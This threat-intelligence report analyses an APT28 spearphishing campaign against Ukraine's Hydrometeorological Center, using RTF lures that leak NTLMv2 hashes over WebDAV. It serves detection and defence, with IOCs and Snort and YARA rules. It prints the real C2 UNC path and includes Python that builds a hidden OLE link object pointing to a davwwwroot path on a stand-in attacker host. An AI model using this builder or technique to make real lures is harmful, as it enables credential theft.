Fancy Bear's Weather Report: APT28 Harvests NTLMv2 Credentials from Ukraine's Meteorologists Using Weaponized RTF Documents
Published: 2026-03-16 | Author: BGI | Investigation Date: 2026-03-16
TL;DR
Russia's APT28 (Fancy Bear / GRU Unit 26165) is running a multi-target NTLMv2 credential harvesting campaign using weaponized RTF documents disguised as Ukrainian Ministry of Emergency Situations correspondence. The primary lure targets the Ukrainian State Hydrometeorological Center (hydro@meteo.gov.ua) via a malformed OLE link object that forces Windows to transmit the victim's NTLMv2 hash over WebDAV-over-HTTP to the attacker-controlled domain wellnesscaremed[.]com -- zero macros, zero security prompts, zero user interaction beyond opening the file. The C2 infrastructure hosted three simultaneous campaign directories -- /venezia/ (Ukraine), /buch/ (German-speaking EU target), and /ankara/ (Turkey) -- mapping directly to APT28's geopolitical collection mandate against NATO and partner states. A critical OPSEC failure in the embedded DOCX secondary payload leaks the attacker's VMware NAT development IP (192.168.217.250), operator aliases Programist and don are burned into document metadata alongside the target recon artifact HMC (HydroMeteoCenter) in the Company field, and a falsified 2009 print date serves as an anti-forensic timestamp that is itself cross-correlatable across the APT28 lure document corpus. The domain was registered 2026-01-12 via Realtime Register B.V. (Netherlands), received four SSL certificates within 15 days across Let's Encrypt and GoDaddy, went operational on 2026-01-29, and was suspended by the registrar approximately 25 days later after community detection. HIGH confidence APT28 attribution based on signature WebDAV UNC NTLMv2 harvest TTP documented across CERT-UA advisories #4386, #5469, and #6123.
The Lure: Emergency Situations Ministry
The spearphish targets the Ukrainian State Hydrometeorological Center (hydro@meteo.gov.ua), a subordinate agency of the Ministry of Environment and Natural Resources. The RTF lure impersonates official correspondence from the Ministry of Ukraine on Emergency Situations and Affairs -- a theme APT28 has used repeatedly against Ukrainian government targets and one documented across multiple CERT-UA advisories.
The document metadata tells the story before the analysis even starts. The Company field reads HMC -- HydroMeteoCenter -- meaning the operator already had organizational reconnaissance on the target before building the lure. The Author field is Programist (Russian for "programmer"), the last-save operator is don, and the print date is falsified to 2009. These are not the marks of a careful operator. They are the marks of a team that builds dozens of lures per week and sometimes forgets to scrub the metadata.
The document itself is a 2.56 MB RTF file, four pages of formatted Ukrainian-language government text. Language settings confirm a Russian-language authoring environment (\lang1049 Russian) targeting a Ukrainian-language audience (\deflang19465 Ukrainian), with codepage 1252 (Windows Latin-1) as the base character encoding. Created January 29, 2026 -- seventeen days after the C2 domain was registered.
Document Metadata Summary
| Field | Value |
|---|---|
| SHA256 | c91183175ce77360006f964841eb4048cf37cb82103f2573e262927be4c7607f |
| MD5 | 7c396677848776f9824ebe408bbba943 |
| SHA1 | d577c4a264fee27084ddf717441eb89f714972a5 |
| File Type | RTF version 1, ANSI, codepage 1252 |
| File Size | 2,683,823 bytes (2.56 MB) |
| First Seen | 2026-03-16 02:46:52 UTC |
| Author | Programist |
| Last Operator | don |
| Company | HMC (HydroMeteoCenter) |
| Created | 2026-01-29 14:54 UTC |
| Print Date | 2009-02-10 (falsified) |
| Language (default) | \deflang19465 -- Ukrainian |
| Language (authoring) | \lang1049 -- Russian |
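The pivots in the table above (author, operator, company, the creation versus print timestamps, and the \deflang/\lang pair) are all stored in the RTF \info group and document header as plain control words, so they can be pulled out for triage without opening the file in Word. The following Python is an added example written for this page, not code from the BGI pipeline: it runs over a constructed RTF stub that carries the field values from the table (the body text is a placeholder) and flags the inconsistencies an analyst would pivot on, such as a print date that predates the creation date.

```python
import re
from datetime import datetime

# Constructed sample (not the campaign document): a minimal RTF whose \info group
# carries the field values listed in the metadata table and the two language
# settings the analysis cites. Body text is placeholder.
SAMPLE_RTF = rb"""{\rtf1\ansi\ansicpg1252\deff0\deflang19465
{\info{\title Lure}{\author Programist}{\operator don}{\company HMC}
{\creatim\yr2026\mo1\dy29\hr14\min54}{\printim\yr2009\mo2\dy10\hr9\min0}}
\pard\lang1049 placeholder body text\par
}"""

TEXT_FIELDS = ("title", "author", "operator", "company")
TIME_FIELDS = ("creatim", "revtim", "printim")


def extract_group(rtf: bytes, name: bytes):
    """Return the brace-balanced {\\name ...} group, or None if absent."""
    start = rtf.find(b"{\\" + name)
    if start < 0:
        return None
    depth = 0
    for i in range(start, len(rtf)):
        if rtf[i] == 0x7B:        # '{'
            depth += 1
        elif rtf[i] == 0x7D:      # '}'
            depth -= 1
            if depth == 0:
                return rtf[start:i + 1]
    return None


def parse_rtf_time(body: bytes) -> datetime:
    """\\yr2009\\mo2\\dy10\\hr9\\min0 -> datetime(2009, 2, 10, 9, 0)."""
    parts = {k.decode(): int(v) for k, v in re.findall(rb"\\(yr|mo|dy|hr|min|sec)(\d+)", body)}
    return datetime(parts.get("yr", 1), parts.get("mo", 1), parts.get("dy", 1),
                    parts.get("hr", 0), parts.get("min", 0), parts.get("sec", 0))


def rtf_metadata(rtf: bytes) -> dict:
    """Pull the \\info fields plus the default and run-level language codes."""
    info = extract_group(rtf, b"info") or b""
    meta = {}
    for field in TEXT_FIELDS:
        m = re.search(rb"\{\\" + field.encode() + rb" ([^}]*)\}", info)
        meta[field] = m.group(1).decode("latin-1").strip() if m else None
    for field in TIME_FIELDS:
        m = re.search(rb"\{\\" + field.encode() + rb"((?:\\[a-z]+\d+)+)\}", info)
        meta[field] = parse_rtf_time(m.group(1)) if m else None
    m = re.search(rb"\\deflang(\d+)", rtf)
    meta["deflang"] = int(m.group(1)) if m else None
    meta["langs"] = sorted({int(x) for x in re.findall(rb"\\lang(\d+)", rtf)})
    return meta


def metadata_flags(meta: dict) -> list:
    """Inconsistencies worth pivoting on; each string is one finding."""
    flags = []
    c, p = meta.get("creatim"), meta.get("printim")
    if c and p and p < c:
        flags.append(f"print date {p:%Y-%m-%d} predates creation {c:%Y-%m-%d}: backdated timestamp")
    if meta.get("deflang") and 1049 in meta["langs"] and meta["deflang"] != 1049:
        flags.append(f"default language {meta['deflang']} differs from authoring run language 1049 (Russian)")
    if meta.get("company"):
        flags.append(f"company field '{meta['company']}' present: possible target recon artifact")
    return flags


if __name__ == "__main__":
    info = rtf_metadata(SAMPLE_RTF)
    for k, v in info.items():
        print(f"{k:>10}: {v}")
    for flag in metadata_flags(info):
        print("FLAG:", flag)
```

The same three functions run unchanged against a real RTF read in binary mode; the \info group is always near the top of the file, so reading the first few hundred kilobytes is enough for large lures.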
Why This Target Matters
The Hydrometeorological Center is not a random government office. It provides weather forecasting data used in military operations planning -- artillery trajectory calculations, aviation sortie scheduling, amphibious landing conditions, and logistics routing all depend on accurate meteorological intelligence. Compromising this agency's credentials gives APT28 access not just to weather data itself, but to the broader Ukrainian government network via lateral movement. The Hydrometeorological Center maintains connectivity to the Ministry of Environment, the Ministry of Defense, and regional emergency coordination systems. It is a soft entry point into a hard target.
Technical Analysis: The NTLMv2 Harvest
RTF files cannot contain VBA macros. APT28 does not need them. The entire attack chain fires through embedded OLE objects within RTF \object\objocx control words. No macros to enable. No security prompt to click through. The victim opens the document, and their credentials leave the building.
The Primary Payload: Malformed OLE Link
The RTF contains four embedded OLE objects. Object 0 is the weapon:
```
Offset 0x00: 01050000 01000000 10000000   (OLELINK1 header, format_id=1)
Offset 0x0C: "Word.Document.8\x00"        (progID -- Word 97-2003)
Offset 0x1C: 57000000                     (path length = 87 bytes)
Offset 0x20: "\\wellnesscaremed.com\davwwwroot\venezia\Favorites\blank.doc\x00"
```
When Microsoft Word parses the RTF and encounters this OLE link, it automatically attempts to resolve it. The \davwwwroot\ path component is the key. Instead of initiating an SMB connection on TCP/445 (which most corporate firewalls block for outbound traffic), Windows recognizes this as a WebDAV path and routes the request through the WebClient service over HTTP/HTTPS on port 80/443.
The WebDAV resolution sequence:
1. Word encounters \object\objocx with OLE LINK
2. Windows resolves UNC path \\wellnesscaremed.com\davwwwroot\...
3. WebClient service intercepts (davwwwroot hint)
4. HTTP OPTIONS request to wellnesscaremed.com:80
5. Server responds with NTLM authentication challenge
6. Windows automatically sends NTLMv2 response containing:
   - Username
   - Domain/workstation name
   - NTLM challenge-response hash
7. Hash captured. Attack complete.
During the HTTP WebDAV handshake, Windows sends the victim's NTLMv2 credential hash to the attacker's server. No prompt. No dialog. No user interaction beyond opening the file. The object is sized at 270x270 twips -- roughly a third of an inch square -- making it invisible in the page layout.
The captured hash structure:
```
username::DOMAIN:server_challenge:NTLMv2_response:blob
```
From here, the attacker has two options: crack the hash offline with hashcat (trivial for weak passwords, feasible for moderate ones with GPU clusters) or relay it in real-time for immediate lateral movement into the target network. NTLMv2 relay is particularly effective in environments where SMB signing is not enforced, which remains common in government networks.
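To show what the object dump above looks like once it is parsed rather than eyeballed, here is an added Python example (not code from the original analysis). It rebuilds the OLE 1.0 ObjectHeader layout the dump follows (OLEVersion, FormatID, then length-prefixed ClassName, TopicName and ItemName), wraps a constructed object in RTF \objdata hex the way Word emits it, and then extracts and triages every \object group in the file: linked versus embedded, UNC target, the davwwwroot hint, and sub-inch object dimensions. The hostname attacker.example in the sample is a placeholder; the directory structure follows the page's /davwwwroot/venezia/ path.

```python
import re
import struct

# --- constructed sample -------------------------------------------------------
def build_ole1_header(class_name: bytes, topic: bytes, format_id: int = 1) -> bytes:
    """Serialise an OLE 1.0 ObjectHeader: version 0x501, FormatID (1 = link,
    2 = embedded), then LengthPrefixedAnsiString ClassName, TopicName, ItemName."""
    def lp_string(s: bytes) -> bytes:
        # 4-byte little-endian length that includes the terminating NUL
        return struct.pack("<I", len(s) + 1) + s + b"\x00"
    header = struct.pack("<II", 0x00000501, format_id)
    return header + lp_string(class_name) + lp_string(topic) + struct.pack("<I", 0)  # empty ItemName


def wrap_in_rtf(ole_blob: bytes, width: int, height: int) -> bytes:
    """Embed the object as Word does: \\object\\objocx with \\objw/\\objh in twips and
    the payload as line-wrapped hex inside {\\*\\objdata ...}."""
    hex_text = ole_blob.hex()
    lines = [hex_text[i:i + 64] for i in range(0, len(hex_text), 64)]
    body = b"{\\object\\objocx\\objw%d\\objh%d{\\*\\objdata\n%s}}" % (
        width, height, "\n".join(lines).encode())
    return b"{\\rtf1\\ansi\\deff0 Lure text.\n" + body + b"}"


# Placeholder hostname; the path mirrors the campaign's /davwwwroot/venezia/ layout.
SAMPLE_RTF = wrap_in_rtf(
    build_ole1_header(b"Word.Document.8",
                      b"\\\\attacker.example\\davwwwroot\\venezia\\Favorites\\blank.doc"),
    270, 270)

# --- parser / triage ----------------------------------------------------------
OBJECT_RE = re.compile(rb"\\object(?P<attrs>.*?)\\objdata\s*(?P<hex>[0-9A-Fa-f\s]+)", re.DOTALL)


def parse_ole1_header(blob: bytes) -> dict:
    """Decode the ObjectHeader; raises struct.error if the blob is too short."""
    version, format_id = struct.unpack_from("<II", blob, 0)
    off, fields = 8, []
    for _ in range(3):  # ClassName, TopicName, ItemName
        (n,) = struct.unpack_from("<I", blob, off)
        off += 4
        fields.append(blob[off:off + n].rstrip(b"\x00").decode("latin-1") if n else "")
        off += n
    class_name, topic, item = fields
    return {"version": version, "format_id": format_id,
            "class_name": class_name, "topic": topic, "item": item}


def triage_object(meta: dict, width, height) -> list:
    """Return the findings a defender cares about for one object."""
    findings = []
    if meta["format_id"] == 1:
        findings.append("linked object: Word resolves the target when the file is opened")
    if meta["topic"].startswith("\\\\"):
        findings.append("UNC target: outbound authentication to a remote host")
    if "davwwwroot" in meta["topic"].lower():
        findings.append("davwwwroot hint: routed via WebClient over HTTP, not SMB/445")
    if width is not None and height is not None and width < 1440 and height < 1440:
        findings.append(f"sub-inch object ({width}x{height} twips): invisible in layout")
    return findings


def scan_rtf(rtf: bytes) -> list:
    """Extract every \\object group, decode its \\objdata hex and triage it."""
    results = []
    for m in OBJECT_RE.finditer(rtf):
        attrs = m.group("attrs")
        w = re.search(rb"\\objw(\d+)", attrs)
        h = re.search(rb"\\objh(\d+)", attrs)
        width = int(w.group(1)) if w else None
        height = int(h.group(1)) if h else None
        blob = bytes.fromhex(re.sub(rb"\s", b"", m.group("hex")).decode("ascii"))
        try:
            meta = parse_ole1_header(blob)
        except struct.error:
            continue  # not an OLE 1.0 stream we understand; skip
        meta.update(width=width, height=height, findings=triage_object(meta, width, height))
        results.append(meta)
    return results


if __name__ == "__main__":
    for obj in scan_rtf(SAMPLE_RTF):
        print(obj["class_name"], obj["format_id"], obj["topic"])
        for f in obj["findings"]:
            print("  -", f)
```

The first twelve bytes the builder emits are exactly the 01050000 01000000 10000000 shown in the dump (version 0x501, format_id 1, class-name length 0x10 for "Word.Document.8" plus NUL), which is a quick way to confirm a parser is reading the header at the right offsets.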
The Full OLE Object Table
| # | RTF Offset | Type | Class | MD5 | Purpose |
|---|---|---|---|---|---|
| 0 | 0027C856h | OLE Link (malformed) | Word.Document.8 | d2779a0c25f63a344fb57266171d9d27 | NTLMv2 harvester |
| 1 | 0027DF02h | Embedded | IE WebBrowser ActiveX | 0ea6fc8d476591fd80e6cec26f353d25 | Secondary resource loader |
| 2 | 0027F503h | Embedded | IE WebBrowser ActiveX | 6ce6b82d33d3d7305a321af207e37124 | Secondary resource loader |
| 3 | 00280AB9h | Embedded | Word.Document.12 | cad4f8ce48d31d6c10253ddbbd00a993 | DOCX secondary payload |
Objects 1 and 2 use CLSID EAB22AC3-30C1-11CF-A7EB-0000C05BAE0B -- the Microsoft Internet Explorer WebBrowser ActiveX control (Shell.Explorer), providing an in-process HTML rendering engine as a secondary collection vector. These objects can load arbitrary HTML content within the document context, enabling additional fingerprinting or payload delivery if the primary NTLMv2 harvest succeeds.
The WebDAV Bypass Explained
Traditional NTLMv2 harvesting uses direct SMB UNC paths (\\attacker.com\share\file), which connect on TCP/445. Most organizations block outbound SMB at the perimeter. APT28's refinement is the \davwwwroot\ path hint, which tells Windows to use the WebClient service instead of the SMB redirector. The WebClient service issues HTTP requests on port 80/443 -- traffic that passes through virtually every firewall and proxy. This is not a novel discovery, but the combination of RTF delivery, malformed OLE objects, invisible dimensions, and WebDAV HTTP bypass into a single zero-interaction attack chain is an APT28 signature.
The Secondary Payload: An OPSEC Gift
Object 3 is an embedded DOCX (25,088 bytes) that reveals the attacker's development environment. The DOCX frameset references two external resources:
word/_rels/webSettings.xml.rels:
```xml
<Relationship Id="rId1" Type=".../frame"
    Target="file:///C:/Windows/diagnostics/index/WindowsUpdateDiagnostic.xml"
    TargetMode="External"/>
```
word/document.xml:
```html
<link rel=stylesheet href=http://192.168.217.250/scr2.rss>
```
The frameset loads a local Windows XML diagnostic file -- likely used for system fingerprinting or patch-level detection. The WindowsUpdateDiagnostic.xml file contains the host's Windows Update configuration and recent patch history, providing the attacker with information needed to select subsequent exploits.
But the real finding is the second reference: 192.168.217.250 sits in VMware's default NAT subnet (192.168.217.0/24, typically assigned by VMware Workstation or Fusion to guest VMs via the vmnet8 adapter). This is the attacker's internal development VM. They built and tested the payload in a VMware environment and shipped it without replacing the development server address with a production C2. The scr2.rss endpoint -- probably "script 2" disguised as an RSS feed -- is a test beacon that will never fire against real targets because the IP is not routable on the public internet.
The DOCX metadata is deliberately anonymized: Creator x, last modified by x, creation timestamp falsified to 2022-04-13. The anonymization of the DOCX metadata contrasts with the sloppy metadata in the parent RTF, suggesting the embedded DOCX was built by a different team member or at a different stage of the development pipeline.
Infection Chain
```text
DELIVERY
  Spearphish email to hydro@meteo.gov.ua
  Attachment: RTF impersonating Ukrainian Ministry of Emergency Situations
  4 pages, 1,475 words, professional government formatting
  Language: Ukrainian body / Russian authoring environment
        |
        v
EXECUTION (zero user interaction beyond opening the file)
  Word parses RTF -> encounters \object\objocx
  OLE LINK (format_id=1) auto-resolution triggered
  Object dimensions: 270x270 twips (invisible in layout)
        |
        v
CREDENTIAL HARVEST (primary)
  Windows WebClient service -> HTTP/WebDAV to wellnesscaremed[.]com:80
  Path: /davwwwroot/venezia/Favorites/blank.doc
  Server issues NTLM challenge
  Windows responds with NTLMv2 hash (username, domain, response)
  Hash transmitted to attacker -- credential theft complete
        |
        v
SECONDARY BEACONS
  +-- Word.Document.12 frameset
  |     -> file:///C:/Windows/diagnostics/index/WindowsUpdateDiagnostic.xml
  |        (system fingerprinting / patch-level detection)
  +-- CSS beacon -> http://192.168.217.250/scr2.rss
  |        (dev artifact -- VMware NAT, dead in production)
  +-- IE WebBrowser ActiveX (Shell.Explorer) x2
           (in-process HTML rendering for additional payloads)
        |
        v
POST-EXPLOITATION (inferred)
  Option A: Offline hash crack (hashcat/john) -> plaintext credentials
            Weak passwords: minutes. Moderate: hours to days.
  Option B: Real-time NTLM relay -> immediate network access
            Effective where SMB signing is not enforced
    -> VPN / OWA / RDP into Ukrainian government networks
    -> Lateral movement to Ministry of Defense, emergency systems
```
Three Campaigns, One Server
The C2 domain wellnesscaremed[.]com did not host a single operation. URLScan.io data reveals three distinct campaign directories running simultaneously from the same server:
| Campaign Code | Path | Target Assessment | Evidence |
|---|---|---|---|
| venezia | /venezia/, /davwwwroot/venezia/ | Ukraine -- Hydrometeorological Center | RTF lure content, hydro@meteo.gov.ua hyperlink, HMC metadata |
| buch | /buch/, /davwwwroot/buch/ | German-speaking / European | Path name (buch = German for "book"); Germany is NATO's largest European member |
| ankara | /ankara/ | Turkey -- Government or NATO affiliate | Path name (capital of Turkey); Turkey controls Bosphorus strait access |
Ukraine. A German-speaking European target. Turkey. These are not random. They map directly to APT28's geopolitical mandate: destabilize NATO-adjacent states and harvest credentials from Ukrainian government agencies involved in the war effort. The Hydrometeorological Center provides weather data used in military operations planning -- this is intelligence collection, not espionage for espionage's sake.
Each campaign directory follows the same structure: a /davwwwroot/ path for NTLMv2 WebDAV triggers and a parallel path for LNK-based delivery. The operator runs multiple spearphishing campaigns from a single piece of infrastructure, differentiated only by directory names that double as campaign tracking codes.
Per-Campaign URL Structure
```text
UKRAINE (venezia):
  NTLMv2:  /davwwwroot/venezia/Favorites/blank.doc
  LNK:     /venezia/Favorites/document.doc.LnK?init=
  Status:  /venezia/d/sd
EUROPE (buch):
  NTLMv2:  /davwwwroot/buch/Downloads/blank.doc
  LNK:     /buch/Downloads/document.doc.LnK?init=
  LNK SSL: /buch/Downloads/document.doc.LnK? (HTTPS variant)
TURKEY (ankara):
  LNK:     /ankara/Favorites/document.doc.lnk
```
The path structure differences are telling. The venezia and buch campaigns both use blank.doc as the WebDAV NTLMv2 trigger filename and document.doc.LnK for LNK-based delivery. The ankara campaign only has a LNK path visible in URLScan data -- either the WebDAV component was deployed on a different subdirectory, or the Turkish campaign was at an earlier stage of development when the infrastructure was burned. The venezia campaign has an additional /d/sd endpoint that may serve as a data exfiltration or status callback path.
Infrastructure Timeline
| Date | Event |
|---|---|
| 2026-01-12 | wellnesscaremed[.]com registered via Realtime Register B.V. (Netherlands) |
| 2026-01-13 | First Let's Encrypt certificate issued (~24h from registration) |
| 2026-01-27 | Additional Let's Encrypt certificate issued |
| 2026-01-28 | GoDaddy SSL certificate + another Let's Encrypt cert issued (3 certs in 2 days) |
| 2026-01-29 | RTF lure document authored (per metadata timestamp) |
| 2026-02-04/05 | 81 URLScan.io scans (community investigation/disclosure) |
| ~2026-02-06 | Domain suspended (clientHold) by registrar |
| 2026-03-16 | Domain remains NXDOMAIN; active IP unrecoverable via DNS |
Seventeen days from domain registration to operational deployment. Four certificates issued within 15 days across two certificate authorities -- a rapid tempo suggesting automated certificate management. The dual-CA approach (Let's Encrypt for free rapid issuance, GoDaddy for perceived legitimacy) is consistent with infrastructure designed to survive certificate revocation of any single issuer. The domain was burned within a month -- 81 URLScan hits in two days means someone in the community caught it, and the registrar acted fast.
Certificate Transparency Logs
| Cert ID | Not Before | Not After | Issuer | Validity |
|---|---|---|---|---|
| 23744250475 | 2026-01-13 | 2026-04-13 | Let's Encrypt E7 | 90 days |
| 24012301485 | 2026-01-27 | 2026-04-27 | Let's Encrypt E8 | 90 days |
| 24027031614 | 2026-01-28 | 2026-08-14 | GoDaddy Secure G2 | 198 days |
| 24034150794 | 2026-01-28 | 2026-04-28 | Let's Encrypt E7 | 90 days |
The GoDaddy certificate has a significantly longer validity period (198 days vs 90 days for Let's Encrypt), providing operational continuity even if the Let's Encrypt certs are not renewed. The issuance of two certificates on the same day (January 28) from different authorities suggests the operator was configuring redundant TLS termination -- possibly a reverse proxy with fallback certificate chains.
Attribution: APT28 / Fancy Bear / GRU Unit 26165
Confidence: HIGH
This is not a novel technique -- it is a signature one. NTLMv2 harvesting via WebDAV UNC paths embedded in RTF documents is documented across multiple CERT-UA advisories (CERT-UA#4386, #5469, #6123) specifically attributed to APT28. The \davwwwroot\ WebDAV path -- instead of a direct SMB UNC -- is an APT28 refinement designed to bypass corporate firewalls that block outbound SMB on TCP/445 while allowing HTTP/HTTPS.
The attribution evidence stacks:
- Technique fingerprint. The specific structure of a malformed format_id=1 OLE LINK within \object\objocx with invisible dimensions (270x270 twips) matches published APT28 samples in open-source repositories. This is not a generic NTLMv2 trick -- the implementation details, including the Word.Document.8 progID choice and the davwwwroot path hint, are consistent across known APT28 operations dating back to at least 2023.
- Target selection. The Ukrainian State Hydrometeorological Service has strategic intelligence value (weather data for military operations) and network connectivity to other Ukrainian government ministries. APT28 uses soft targets like this for initial credential access into broader government networks.
- Multi-campaign infrastructure. Simultaneous venezia, buch, and ankara campaigns from a single C2, targeting Ukraine, a German-speaking European country, and Turkey, mirror APT28's documented pattern of running parallel operations against NATO and partner states from shared infrastructure.
- Lure theme. Ministry of Emergency Situations impersonation is a repeatedly observed APT28 social engineering category in CERT-UA reporting.
- Development artifacts. Russian-language authoring environment (\lang1049), VMware-based development infrastructure (192.168.217.0/24), and the operator aliases Programist and don are consistent with a Russian state-sponsored development team operating in a Moscow-timezone work schedule.
- Infrastructure tempo. Domain registered to first certificate in under 24 hours, domain to operational payload in 17 days, matching APT28's rapid deployment pattern documented in prior campaigns.
- Anti-forensic patterns. The falsified 2009 print date is a recurring APT28 tactic -- backdating document metadata to confuse timeline reconstruction. This specific pattern (print dates predating the actual creation date by many years) has been observed in at least three other CERT-UA attributed APT28 RTF campaigns.
OPSEC Failures Worth Tracking
| Mistake | Intelligence Value |
|---|---|
| 192.168.217.250 in shipped payload | Confirms VMware dev environment; 192.168.217.0/24 subnet correlatable across campaigns |
| Programist author alias | Russian for "programmer"; trackable across other APT28 lure documents via metadata pivot |
| don last-save alias | Second operator handle; indicates multi-person lure production pipeline |
| HMC company field | Proves target reconnaissance preceded document creation; operator knew the org abbreviation |
| Falsified 2009 print date | Consistent APT28 anti-forensic pattern; cross-correlatable as a behavioral signature |
| Unsanitized DOCX in Object 3 | Dev VM IP leaked; DOCX metadata anonymized but parent RTF metadata was not |
MITRE ATT&CK Mapping
| Technique ID | Technique | Implementation |
|---|---|---|
| T1566.001 | Phishing: Spearphishing Attachment | RTF delivered to hydro@meteo.gov.ua impersonating MES |
| T1221 | Template Injection | OLE link in RTF triggers remote resource fetch via WebDAV |
| T1187 | Forced Authentication | UNC path with davwwwroot forces NTLMv2 hash transmission over HTTP |
| T1110.002 | Brute Force: Password Cracking | Offline NTLMv2 hash cracking via hashcat/john |
| T1550.002 | Use Alternate Authentication Material: Pass the Hash | NTLM relay for real-time lateral movement |
| T1071.001 | Application Layer Protocol: Web Protocols | WebDAV over HTTP/HTTPS for C2, bypassing SMB-blocking firewalls |
| T1204.002 | User Execution: Malicious File | Opening RTF is the only required user action |
| T1036 | Masquerading | Document impersonates Ukrainian Ministry of Emergency Situations correspondence |
| T1583.001 | Acquire Infrastructure: Domains | wellnesscaremed[.]com registered 17 days before deployment |
| T1608.001 | Stage Capabilities: Upload Malware | LNK files + blank.doc staged on C2 server across 3 campaign dirs |
| T1027 | Obfuscated Files or Information | Hex-encoded OLE data, falsified timestamps, invisible object dimensions |
| T1082 | System Information Discovery | WindowsUpdateDiagnostic.xml frameset reference for patch-level fingerprinting |
| T1588.004 | Obtain Capabilities: Digital Certificates | 4 certificates from 2 CAs within 15 days of domain registration |
IOC Tables
File Hashes
| Type | Hash | Description |
|---|---|---|
| SHA256 | c91183175ce77360006f964841eb4048cf37cb82103f2573e262927be4c7607f | Main RTF lure document |
| MD5 | 7c396677848776f9824ebe408bbba943 | Main RTF lure document |
| SHA1 | d577c4a264fee27084ddf717441eb89f714972a5 | Main RTF lure document |
| MD5 | d2779a0c25f63a344fb57266171d9d27 | Object 0: NTLMv2 harvester OLE link |
| MD5 | 0ea6fc8d476591fd80e6cec26f353d25 | Object 1: IE WebBrowser ActiveX |
| MD5 | 6ce6b82d33d3d7305a321af207e37124 | Object 2: IE WebBrowser ActiveX |
| MD5 | cad4f8ce48d31d6c10253ddbbd00a993 | Object 3: Embedded DOCX payload |
| MD5 | f0880da6890be6cab345d7cad47b440b | Extracted DOCX payload (unwrapped) |
Network IOCs
| Indicator | Type | Context |
|---|---|---|
| wellnesscaremed[.]com | Domain | C2 server (SUSPENDED / NXDOMAIN as of 2026-03-16) |
| \\wellnesscaremed.com\davwwwroot\venezia\Favorites\blank.doc | UNC Path | NTLMv2 trigger (Ukraine campaign) |
| http://wellnesscaremed[.]com/davwwwroot/venezia/Favorites/blank.doc | URL | WebDAV NTLMv2 harvest (Ukraine) |
| http://wellnesscaremed[.]com/davwwwroot/buch/Downloads/blank.doc | URL | WebDAV NTLMv2 harvest (EU campaign) |
| http://wellnesscaremed[.]com/venezia/Favorites/document.doc.LnK?init= | URL | LNK delivery (Ukraine) |
| http://wellnesscaremed[.]com/buch/Downloads/document.doc.LnK?init= | URL | LNK delivery (EU) |
| https://wellnesscaremed[.]com/buch/Downloads/document.doc.LnK? | URL | LNK delivery (EU, HTTPS variant) |
| http://wellnesscaremed[.]com/ankara/Favorites/document.doc.lnk | URL | LNK delivery (Turkey campaign) |
| http://wellnesscaremed[.]com/venezia/d/sd | URL | Data exfil/status callback endpoint |
| http://192.168.217.250/scr2.rss | URL | Attacker dev beacon (OPSEC leak -- VMware NAT) |
| 192.168.217.250 | IPv4 | Attacker development machine (VMware NAT subnet) |
Email and Persona IOCs
| Indicator | Type | Context |
|---|---|---|
| hydro@meteo.gov.ua | Email | Targeted victim (Ukrainian State Hydrometeorological Center) |
| Programist | Operator alias | RTF Author field (Russian: "programmer") |
| don | Operator alias | RTF Last-Save-By field |
| HMC | Target artifact | RTF Company field (HydroMeteoCenter -- target recon leak) |
WHOIS -- C2 Domain
| Field | Value |
|---|---|
| Domain | wellnesscaremed[.]com |
| Registry ID | 3056763816_DOMAIN_COM-VRSN |
| Registrar | Realtime Register B.V. (IANA ID 839, Netherlands) |
| Registered | 2026-01-12 14:29:58 UTC |
| Expires | 2027-01-12 14:29:58 UTC |
| Status | clientHold (suspended by registrar) |
| Name Servers | NS1.SUSPENDED-DOMAIN.COM, NS2.SUSPENDED-DOMAIN.COM |
| DNSSEC | Unsigned |
Detection Engineering
Snort/Suricata Rules
```
# Detect outbound NTLM authentication inside a WebDAV session. The WebClient
# service authenticates on its first OPTIONS request (see the resolution
# sequence above), so the rule does not pin the method to PROPFIND. It keys on
# the NTLM Type 3 (AUTHENTICATE) message, whose base64 prefix TlRMTVNTUAAD is
# the request that actually carries the NTLMv2 response. Drop the User-Agent
# match to broaden this to any outbound NTLM-over-HTTP, at the cost of noise.
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (
    msg:"BGI - Outbound WebDAV NTLM Authentication Attempt";
    flow:established,to_server;
    content:"User-Agent: Microsoft-WebDAV-MiniRedir"; http_header;
    content:"Authorization: NTLM TlRMTVNTUAAD"; http_header;
    classtype:credential-theft;
    sid:2026031601; rev:2;)

# Detect wellnesscaremed.com domain in DNS (Suricata 5+ dns.query sticky buffer)
alert dns $HOME_NET any -> any any (
    msg:"BGI - APT28 C2 Domain (wellnesscaremed.com)";
    dns.query; content:"wellnesscaremed.com"; nocase;
    classtype:trojan-activity;
    sid:2026031602; rev:1;)
```
YARA Rule
```yara
rule APT28_RTF_NTLMv2_Harvester {
    meta:
        author = "Breakglass Intelligence"
        date = "2026-03-16"
        description = "APT28 RTF with WebDAV UNC path for NTLMv2 credential harvesting"
        reference = "apt28_c9118317-18b26784"
        tlp = "TLP:CLEAR"
    strings:
        $rtf_header = "{\\rtf1"
        $objocx = "\\object\\objocx"
        // The OLE link lives in \objdata, which RTF stores as hex text (often
        // line-wrapped), so each marker is checked both as raw ASCII and as hex
        // byte pairs separated by up to two whitespace bytes.
        $davwwwroot = "davwwwroot" ascii nocase
        $davwwwroot_hex = /64\s{0,2}61\s{0,2}76\s{0,2}77\s{0,2}77\s{0,2}77\s{0,2}72\s{0,2}6f\s{0,2}6f\s{0,2}74/ nocase
        $ole_link = "Word.Document.8" ascii
        $ole_link_hex = /57\s{0,2}6f\s{0,2}72\s{0,2}64\s{0,2}2e\s{0,2}44\s{0,2}6f\s{0,2}63\s{0,2}75\s{0,2}6d\s{0,2}65\s{0,2}6e\s{0,2}74\s{0,2}2e\s{0,2}38/ nocase
        $unc_prefix = { 5C 5C }   // raw backslash backslash
        $unc_prefix_hex = /5c\s{0,2}5c/ nocase
    condition:
        $rtf_header at 0 and $objocx
        and ($davwwwroot or $davwwwroot_hex)
        and ($ole_link or $ole_link_hex)
        and ($unc_prefix or $unc_prefix_hex)
}
```
Defensive Recommendations
Immediate Actions
- Block outbound NTLM to external hosts. GPO: `Network Security: Restrict NTLM: Outgoing NTLM traffic` set to `Deny all`. This kills the entire attack chain regardless of delivery mechanism, C2 domain, or lure theme. It is the single most effective mitigation.
- Disable the WebClient service on workstations that do not require WebDAV: `sc config WebClient start= disabled && sc stop WebClient` (sc.exe requires the space after `start=`). No WebClient, no HTTP-based NTLM relay. This eliminates the SMB-to-HTTP bypass that makes this technique effective against firewalled environments.
- Add privileged accounts to the Protected Users security group. Protected Users cannot authenticate via NTLM -- only Kerberos. This prevents credential theft for the accounts that matter most.
